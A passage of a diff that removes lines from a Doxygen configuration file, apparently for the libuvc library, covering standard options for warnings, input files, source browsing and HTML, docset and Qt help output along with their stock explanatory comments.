-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, doxygen will hide all friend
-# (class|struct|union) declarations. If set to NO these declarations will be
-# included in the documentation.
-# The default value is: NO.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, doxygen will hide any
-# documentation blocks found inside the body of a function. If set to NO these
-# blocks will be appended to the function's detailed documentation block.
-# The default value is: NO.
-
-HIDE_IN_BODY_DOCS      = YES
-
-# The INTERNAL_DOCS tag determines if documentation that is typed after a
-# \internal command is included. If the tag is set to NO then the documentation
-# will be excluded. Set it to YES to include the internal documentation.
-# The default value is: NO.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then doxygen will only generate file
-# names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-# The default value is: system dependent.
-
-CASE_SENSE_NAMES       = YES
-
-# If the HIDE_SCOPE_NAMES tag is set to NO then doxygen will show members with
-# their full class and namespace scopes in the documentation. If set to YES the
-# scope will be hidden.
-# The default value is: NO.
-
-HIDE_SCOPE_NAMES       = NO
-
-# If the SHOW_INCLUDE_FILES tag is set to YES then doxygen will put a list of
-# the files that are included by a file in the documentation of that file.
-# The default value is: YES.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then doxygen will list include
-# files with double quotes in the documentation rather than with sharp brackets.
-# The default value is: NO.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES then a tag [inline] is inserted in the
-# documentation for inline members.
-# The default value is: YES.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES then doxygen will sort the
-# (detailed) documentation of file and class members alphabetically by member
-# name. If set to NO the members will appear in declaration order.
-# The default value is: YES.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the brief
-# descriptions of file, namespace and class members alphabetically by member
-# name. If set to NO the members will appear in declaration order.
-# The default value is: NO.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen will sort the
-# (brief and detailed) documentation of class members so that constructors and
-# destructors are listed first. If set to NO the constructors will appear in the
-# respective orders defined by SORT_BRIEF_DOCS and SORT_MEMBER_DOCS.
-# Note: If SORT_BRIEF_DOCS is set to NO this option is ignored for sorting brief
-# member documentation.
-# Note: If SORT_MEMBER_DOCS is set to NO this option is ignored for sorting
-# detailed member documentation.
-# The default value is: NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the hierarchy
-# of group names into alphabetical order. If set to NO the group names will
-# appear in their defined order.
-# The default value is: NO.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be sorted by
-# fully-qualified names, including namespaces. If set to NO, the class list will
-# be sorted only by class name, not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the alphabetical
-# list.
-# The default value is: NO.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to do proper
-# type resolution of all parameters of a function it will reject a match between
-# the prototype and the implementation of a member function even if there is
-# only one candidate or it is obvious which candidate to choose by doing a
-# simple string match. By disabling STRICT_PROTO_MATCHING doxygen will still
-# accept a match between prototype and implementation in such cases.
-# The default value is: NO.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable ( YES) or disable ( NO) the
-# todo list. This list is created by putting \todo commands in the
-# documentation.
-# The default value is: YES.
-
-GENERATE_TODOLIST      = NO
-
-# The GENERATE_TESTLIST tag can be used to enable ( YES) or disable ( NO) the
-# test list. This list is created by putting \test commands in the
-# documentation.
-# The default value is: YES.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable ( YES) or disable ( NO) the bug
-# list. This list is created by putting \bug commands in the documentation.
-# The default value is: YES.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable ( YES) or disable ( NO)
-# the deprecated list. This list is created by putting \deprecated commands in
-# the documentation.
-# The default value is: YES.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional documentation
-# sections, marked by \if <section_label> ... \endif and \cond <section_label>
-# ... \endcond blocks.
-
-ENABLED_SECTIONS       =
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines that the
-# initial value of a variable or macro / define can have for it to appear in the
-# documentation. If the initializer consists of more lines than specified here
-# it will be hidden. Use a value of 0 to hide initializers completely. The
-# appearance of the value of individual variables and macros / defines can be
-# controlled using \showinitializer or \hideinitializer command in the
-# documentation regardless of this setting.
-# Minimum value: 0, maximum value: 10000, default value: 30.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated at
-# the bottom of the documentation of classes and structs. If set to YES the list
-# will mention the files that were used to generate the documentation.
-# The default value is: YES.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page. This
-# will remove the Files entry from the Quick Index and from the Folder Tree View
-# (if specified).
-# The default value is: YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the Namespaces
-# page. This will remove the Namespaces entry from the Quick Index and from the
-# Folder Tree View (if specified).
-# The default value is: YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command command input-file, where command is the value of the
-# FILE_VERSION_FILTER tag, and input-file is the name of an input file provided
-# by doxygen. Whatever the program writes to standard output is used as the file
-# version. For an example see the documentation.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option. You can
-# optionally specify a file name after the option, if omitted DoxygenLayout.xml
-# will be used as the name of the layout file.
-#
-# Note that if you run doxygen from a directory containing a file called
-# DoxygenLayout.xml, doxygen will parse it automatically even if the LAYOUT_FILE
-# tag is left empty.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files containing
-# the reference definitions. This must be a list of .bib files. The .bib
-# extension is automatically appended if omitted. This requires the bibtex tool
-# to be installed. See also http://en.wikipedia.org/wiki/BibTeX for more info.
-# For LaTeX the style of the bibliography can be controlled using
-# LATEX_BIB_STYLE. To use this feature you need bibtex and perl available in the
-# search path. Do not use file names with spaces, bibtex cannot handle them. See
-# also \cite for info how to create references.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# Configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated to
-# standard output by doxygen. If QUIET is set to YES this implies that the
-# messages are off.
-# The default value is: NO.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated to standard error ( stderr) by doxygen. If WARNINGS is set to YES
-# this implies that the warnings are on.
-#
-# Tip: Turn warnings on while writing the documentation.
-# The default value is: YES.
-
-WARNINGS               = YES
-
-# If the WARN_IF_UNDOCUMENTED tag is set to YES, then doxygen will generate
-# warnings for undocumented members. If EXTRACT_ALL is set to YES then this flag
-# will automatically be disabled.
-# The default value is: YES.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If the WARN_IF_DOC_ERROR tag is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some parameters
-# in a documented function, or documenting parameters that don't exist or using
-# markup commands wrongly.
-# The default value is: YES.
-
-WARN_IF_DOC_ERROR      = YES
-
-# This WARN_NO_PARAMDOC option can be enabled to get warnings for functions that
-# are documented, but have no documentation for their parameters or return
-# value. If set to NO doxygen will only warn about wrong or incomplete parameter
-# documentation, but not about the absence of documentation.
-# The default value is: NO.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that doxygen
-# can produce. The string should contain the $file, $line, and $text tags, which
-# will be replaced by the file and line number from which the warning originated
-# and the warning text. Optionally the format may contain $version, which will
-# be replaced by the version of the file (if it could be obtained via
-# FILE_VERSION_FILTER)
-# The default value is: $file:$line: $text.
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning and error
-# messages should be written. If left blank the output is written to standard
-# error (stderr).
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag is used to specify the files and/or directories that contain
-# documented source files. You may enter file names like myfile.cpp or
-# directories like /usr/src/myproject. Separate the files or directories with
-# spaces.
-# Note: If this tag is empty the current directory is searched.
-
-INPUT                  = src \
-                         include/libuvc
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding. Doxygen uses
-# libiconv (or the iconv built into libc) for the transcoding. See the libiconv
-# documentation (see: http://www.gnu.org/software/libiconv) for the list of
-# possible encodings.
-# The default value is: UTF-8.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard patterns (like *.cpp and
-# *.h) to filter out the source-files in the directories. If left blank the
-# following patterns are tested:*.c, *.cc, *.cxx, *.cpp, *.c++, *.java, *.ii,
-# *.ixx, *.ipp, *.i++, *.inl, *.idl, *.ddl, *.odl, *.h, *.hh, *.hxx, *.hpp,
-# *.h++, *.cs, *.d, *.php, *.php4, *.php5, *.phtml, *.inc, *.m, *.markdown,
-# *.md, *.mm, *.dox, *.py, *.f90, *.f, *.for, *.tcl, *.vhd, *.vhdl, *.ucf,
-# *.qsf, *.as and *.js.
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to specify whether or not subdirectories should
-# be searched for input files as well.
-# The default value is: NO.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-#
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                = include/libuvc/libuvc_internal.h \
-                         include/utlist.h
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-# The default value is: NO.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories.
-#
-# Note that the wildcards are matched against the file with absolute path, so to
-# exclude all test directories for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-#
-# Note that the wildcards are matched against the file with absolute path, so to
-# exclude all test directories use the pattern */test/*
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or directories
-# that contain example code fragments that are included (see the \include
-# command).
-
-EXAMPLE_PATH           = src
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp and
-# *.h) to filter out the source-files in the directories. If left blank all
-# files are included.
-
-EXAMPLE_PATTERNS       =
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude commands
-# irrespective of the value of the RECURSIVE tag.
-# The default value is: NO.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or directories
-# that contain images that are to be included in the documentation (see the
-# \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command:
-#
-# <filter> <input-file>
-#
-# where <filter> is the value of the INPUT_FILTER tag, and <input-file> is the
-# name of an input file. Doxygen will then use the output that the filter
-# program writes to standard output. If FILTER_PATTERNS is specified, this tag
-# will be ignored.
-#
-# Note that the filter must not add or remove lines; it is applied before the
-# code is scanned, but not when the output code is generated. If lines are added
-# or removed, the anchors will not be placed correctly.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis. Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match. The filters are a list of the form: pattern=filter
-# (like *.cpp=my_cpp_filter). See INPUT_FILTER for further information on how
-# filters are used. If the FILTER_PATTERNS tag is empty or if none of the
-# patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER ) will also be used to filter the input files that are used for
-# producing the source files to browse (i.e. when SOURCE_BROWSER is set to YES).
-# The default value is: NO.
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any) and
-# it is also possible to disable source filtering for a specific pattern using
-# *.ext= (so without naming a filter).
-# This tag requires that the tag FILTER_SOURCE_FILES is set to YES.
-
-FILTER_SOURCE_PATTERNS =
-
-# If the USE_MDFILE_AS_MAINPAGE tag refers to the name of a markdown file that
-# is part of the input, its contents will be placed on the main page
-# (index.html). This can be useful if you have a project on for instance GitHub
-# and want to reuse the introduction page also for the doxygen output.
-
-USE_MDFILE_AS_MAINPAGE =
-
-#---------------------------------------------------------------------------
-# Configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will be
-# generated. Documented entities will be cross-referenced with these sources.
-#
-# Note: To get rid of all source code in the generated output, make sure that
-# also VERBATIM_HEADERS is set to NO.
-# The default value is: NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body of functions,
-# classes and enums directly into the documentation.
-# The default value is: NO.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES will instruct doxygen to hide any
-# special comment blocks from generated source code fragments. Normal C, C++ and
-# Fortran comments will always remain visible.
-# The default value is: YES.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES then for each documented
-# function all documented functions referencing it will be listed.
-# The default value is: NO.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES then for each documented function
-# all documented entities called/used by that function will be listed.
-# The default value is: NO.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES and SOURCE_BROWSER tag is set
-# to YES, then the hyperlinks from functions in REFERENCES_RELATION and
-# REFERENCED_BY_RELATION lists will link to the source code. Otherwise they will
-# link to the documentation.
-# The default value is: YES.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If SOURCE_TOOLTIPS is enabled (the default) then hovering a hyperlink in the
-# source code will show a tooltip with additional information such as prototype,
-# brief description and links to the definition and documentation. Since this
-# will make the HTML file larger and loading of large files a bit slower, you
-# can opt to disable this feature.
-# The default value is: YES.
-# This tag requires that the tag SOURCE_BROWSER is set to YES.
-
-SOURCE_TOOLTIPS        = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code will
-# point to the HTML generated by the htags(1) tool instead of doxygen built-in
-# source browser. The htags tool is part of GNU's global source tagging system
-# (see http://www.gnu.org/software/global/global.html). You will need version
-# 4.8.6 or higher.
-#
-# To use it do the following:
-# - Install the latest version of global
-# - Enable SOURCE_BROWSER and USE_HTAGS in the config file
-# - Make sure the INPUT points to the root of the source tree
-# - Run doxygen as normal
-#
-# Doxygen will invoke htags (and that will in turn invoke gtags), so these
-# tools must be available from the command line (i.e. in the search path).
-#
-# The result: instead of the source browser generated by doxygen, the links to
-# source code will now point to the output of htags.
-# The default value is: NO.
-# This tag requires that the tag SOURCE_BROWSER is set to YES.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set the YES then doxygen will generate a
-# verbatim copy of the header file for each class for which an include is
-# specified. Set to NO to disable this.
-# See also: Section \class.
-# The default value is: YES.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# Configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index of all
-# compounds will be generated. Enable this if the project contains a lot of
-# classes, structs, unions or interfaces.
-# The default value is: YES.
-
-ALPHABETICAL_INDEX     = YES
-
-# The COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns in
-# which the alphabetical index list will be split.
-# Minimum value: 1, maximum value: 20, default value: 5.
-# This tag requires that the tag ALPHABETICAL_INDEX is set to YES.
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all classes will
-# be put under the same header in the alphabetical index. The IGNORE_PREFIX tag
-# can be used to specify a prefix (or a list of prefixes) that should be ignored
-# while generating the index headers.
-# This tag requires that the tag ALPHABETICAL_INDEX is set to YES.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES doxygen will generate HTML output
-# The default value is: YES.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put. If a
-# relative path is entered the value of OUTPUT_DIRECTORY will be put in front of
-# it.
-# The default directory is: html.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_OUTPUT            = doc
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for each
-# generated HTML page (for example: .htm, .php, .asp).
-# The default value is: .html.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a user-defined HTML header file for
-# each generated HTML page. If the tag is left blank doxygen will generate a
-# standard header.
-#
-# To get valid HTML the header file that includes any scripts and style sheets
-# that doxygen needs, which is dependent on the configuration options used (e.g.
-# the setting GENERATE_TREEVIEW). It is highly recommended to start with a
-# default header using
-# doxygen -w html new_header.html new_footer.html new_stylesheet.css
-# YourConfigFile
-# and then modify the file new_header.html. See also section "Doxygen usage"
-# for information on how to generate the default header that doxygen normally
-# uses.
-# Note: The header is subject to change so you typically have to regenerate the
-# default header when upgrading to a newer version of doxygen. For a description
-# of the possible markers and block names see the documentation.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a user-defined HTML footer for each
-# generated HTML page. If the tag is left blank doxygen will generate a standard
-# footer. See HTML_HEADER for more information on how to generate a default
-# footer and what special commands can be used inside the footer. See also
-# section "Doxygen usage" for information on how to generate the default footer
-# that doxygen normally uses.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading style
-# sheet that is used by each HTML page. It can be used to fine-tune the look of
-# the HTML output. If left blank doxygen will generate a default style sheet.
-# See also section "Doxygen usage" for information on how to generate the style
-# sheet that doxygen normally uses.
-# Note: It is recommended to use HTML_EXTRA_STYLESHEET instead of this tag, as
-# it is more robust and this tag (HTML_STYLESHEET) will in the future become
-# obsolete.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_STYLESHEET tag can be used to specify an additional user-
-# defined cascading style sheet that is included after the standard style sheets
-# created by doxygen. Using this option one can overrule certain style aspects.
-# This is preferred over using HTML_STYLESHEET since it does not replace the
-# standard style sheet and is therefor more robust against future updates.
-# Doxygen will copy the style sheet file to the output directory. For an example
-# see the documentation.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_EXTRA_STYLESHEET  =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath^ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that the
-# files will be copied as-is; there are no commands or markers available.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output. Doxygen
-# will adjust the colors in the stylesheet and background images according to
-# this color. Hue is specified as an angle on a colorwheel, see
-# http://en.wikipedia.org/wiki/Hue for more information. For instance the value
-# 0 represents red, 60 is yellow, 120 is green, 180 is cyan, 240 is blue, 300
-# purple, and 360 is red again.
-# Minimum value: 0, maximum value: 359, default value: 220.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of the colors
-# in the HTML output. For a value of 0 the output will use grayscales only. A
-# value of 255 will produce the most vivid colors.
-# Minimum value: 0, maximum value: 255, default value: 100.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to the
-# luminance component of the colors in the HTML output. Values below 100
-# gradually make the output lighter, whereas values above 100 make the output
-# darker. The value divided by 100 is the actual gamma applied, so 80 represents
-# a gamma of 0.8, The value 220 represents a gamma of 2.2, and 100 does not
-# change the gamma.
-# Minimum value: 40, maximum value: 240, default value: 80.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting this
-# to NO can help when comparing the output of multiple runs.
-# The default value is: YES.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_DYNAMIC_SECTIONS  = YES
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of entries
-# shown in the various tree structured indices initially; the user can expand
-# and collapse entries dynamically later on. Doxygen will expand the tree to
-# such a level that at most the specified number of entries are visible (unless
-# a fully collapsed tree already exceeds this amount). So setting the number of
-# entries 1 will produce a full collapsed tree by default. 0 is a special value
-# representing an infinite number of entries and will result in a full expanded
-# tree by default.
-# Minimum value: 0, maximum value: 9999, default value: 100.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files will be
-# generated that can be used as input for Apple's Xcode 3 integrated development
-# environment (see: http://developer.apple.com/tools/xcode/), introduced with
-# OSX 10.5 (Leopard). To create a documentation set, doxygen will generate a
-# Makefile in the HTML output directory. Running make will produce the docset in
-# that directory and running make install will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find it at
-# startup. See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_DOCSET        = NO
-
-# This tag determines the name of the docset feed. A documentation feed provides
-# an umbrella under which multiple documentation sets from a single provider
-# (such as a company or product suite) can be grouped.
-# The default value is: Doxygen generated docs.
-# This tag requires that the tag GENERATE_DOCSET is set to YES.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# This tag specifies a string that should uniquely identify the documentation
-# set bundle. This should be a reverse domain-name style string, e.g.
-# com.mycompany.MyDocSet. Doxygen will append .docset to the name.
-# The default value is: org.doxygen.Project.
-# This tag requires that the tag GENERATE_DOCSET is set to YES.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# The DOCSET_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-# The default value is: org.doxygen.Publisher.
-# This tag requires that the tag GENERATE_DOCSET is set to YES.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The DOCSET_PUBLISHER_NAME tag identifies the documentation publisher.
-# The default value is: Publisher.
-# This tag requires that the tag GENERATE_DOCSET is set to YES.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES then doxygen generates three
-# additional HTML index files: index.hhp, index.hhc, and index.hhk. The
-# index.hhp is a project file that can be read by Microsoft's HTML Help Workshop
-# (see: http://www.microsoft.com/en-us/download/details.aspx?id=21138) on
-# Windows.
-#
-# The HTML Help Workshop contains a compiler that can convert all HTML output
-# generated by doxygen into a single compiled HTML file (.chm). Compiled HTML
-# files are now used as the Windows 98 help format, and will replace the old
-# Windows help format (.hlp) on all Windows platforms in the future. Compressed
-# HTML files also contain an index, a table of contents, and you can search for
-# words in the documentation. The HTML workshop also contains a viewer for
-# compressed HTML files.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_HTMLHELP      = NO
-
-# The CHM_FILE tag can be used to specify the file name of the resulting .chm
-# file. You can add a path in front of the file if the result should not be
-# written to the html output directory.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-CHM_FILE               =
-
-# The HHC_LOCATION tag can be used to specify the location (absolute path
-# including file name) of the HTML help compiler ( hhc.exe). If non-empty
-# doxygen will try to run the HTML help compiler on the generated index.hhp.
-# The file has to be specified with full path.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-HHC_LOCATION           =
-
-# The GENERATE_CHI flag controls if a separate .chi index file is generated (
-# YES) or that it should be included in the master .chm file ( NO).
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-GENERATE_CHI           = NO
-
-# The CHM_INDEX_ENCODING is used to encode HtmlHelp index ( hhk), content ( hhc)
-# and project file content.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-CHM_INDEX_ENCODING     =
-
-# The BINARY_TOC flag controls whether a binary table of contents is generated (
-# YES) or a normal table of contents ( NO) in the .chm file.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members to
-# the table of contents of the HTML help documentation and to the tree view.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTMLHELP is set to YES.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated that
-# can be used as input for Qt's qhelpgenerator to generate a Qt Compressed Help
-# (.qch) of the generated HTML documentation.
-# The default value is: NO.
-# This tag requires that the tag GENERATE_HTML is set to YES.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can be used to specify
-# the file name of the resulting .qch file. The path specified is relative to
-# the HTML output folder.
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating Qt Help
-# Project output. For more information please see Qt Help Project / Namespace
-# (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#namespace).
-# The default value is: org.doxygen.Project.
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_NAMESPACE          = org.doxygen.Project
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating Qt
-# Help Project output. For more information please see Qt Help Project / Virtual
-# Folders (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#virtual-
-# folders).
-# The default value is: doc.
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If the QHP_CUST_FILTER_NAME tag is set, it specifies the name of a custom
-# filter to add. For more information please see Qt Help Project / Custom
-# Filters (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#custom-
-# filters).
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILTER_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see Qt Help Project / Custom
-# Filters (see: http://qt-project.org/doc/qt-4.8/qthelpproject.html#custom-
-# filters).
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's filter section matches. Qt Help Project / Filter Attributes (see:
-# http://qt-project.org/doc/qt-4.8/qthelpproject.html#filter-attributes).
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# The QHG_LOCATION tag can be used to specify the location of Qt's
-# qhelpgenerator. If non-empty doxygen will try to run qhelpgenerator on the
-# generated .qhp file.
-# This tag requires that the tag GENERATE_QHP is set to YES.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files will be
-# generated, together with the HTML files, they form an Eclipse help plugin. To
-# install this plugin and make it available under the help contents menu in
